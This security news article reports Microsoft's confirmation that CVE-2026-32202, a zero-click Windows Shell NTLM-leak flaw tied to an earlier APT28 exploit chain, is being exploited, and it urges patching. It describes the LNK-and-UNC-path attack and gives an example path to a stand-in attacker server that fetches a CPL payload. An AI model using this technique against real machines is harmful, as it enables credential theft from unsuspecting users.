Microsoft Confirms Active Exploitation of Windows Shell CVE-2026-32202: Windows Shell Spoofing Bug Under Attack
Microsoft has confirmed that CVE-2026-32202, a Windows Shell spoofing vulnerability patched in April 2026, is being actively exploited in the wild as a zero-click credential theft vector.
Microsoft on Monday revised its advisory for CVE-2026-32202, a Windows Shell spoofing vulnerability (CVSS 4.3) patched in the April 2026 Patch Tuesday update, to confirm active exploitation in the wild. The flaw, discovered and reported by Akamai security researcher Maor Dahan, stems from an incomplete fix for CVE-2026-21510 — a vulnerability previously weaponized by Russian state-sponsored group APT28 (Fancy Bear) in attacks targeting Ukraine and EU nations.
The vulnerability allows an attacker to coerce a victim's machine into leaking NTLM hashes without any user interaction. When a victim opens a malicious Windows Shortcut (LNK) file containing a Universal Naming Convention (UNC) path (e.g., `\\attacker.com\share\payload.cpl`), Windows automatically initiates an SMB connection to the attacker's server. This triggers an automatic NTLM authentication handshake, sending the victim's Net-NTLMv2 hash to the attacker, which can then be used for NTLM relay attacks or offline password cracking.
Akamai's Dahan explained that while Microsoft's February 2026 February 2026 patch for CVE-2026-21510 mitigated the remote code execution risk by adding a SmartScreen check on the Control Panel (CPL) file's digital signature and origin zone, it still allowed the victim machine to authenticate to the attacker's server and fetch the CPL file automatically. "While Microsoft fixed the initial RCE (CVE-2026-21510), an authentication coercion flaw (CVE-2026-32202) remained. This gap between path resolution and trust verification left a zero-click credential theft vector via auto-parsed LNK files," Dahan noted.
The original CVE-2026-21510 and a related MSHTML Framework flaw (CVE-2026-21513) were both exploited by APT28 in December 2025 as part of an exploit chain that bypassed Microsoft Defender SmartScreen. The campaign leveraged malicious LNK files to load a DLL from a remote server using a UNC path, with the DLL loaded as part of CPL objects without proper network zone validation.
Microsoft acknowledged that the initial advisory for CVE-2026-32202 published on April 14 contained incorrect Exploitability Index, Exploited flag and CVSS vector information, which it corrected on April 27. The company did not share specific details about the current exploitation activity, but the confirmation of active exploitation raises the urgency for organizations to apply the April 2026 security updates.
The vulnerability affects all supported versions of Windows, and while the CVSS score is relatively low at 4.3, the zero-click nature of the attack and the potential for credential theft make it a significant threat. Security teams are advised to prioritize patching and monitor for suspicious SMB connections originating from LNK file interactions.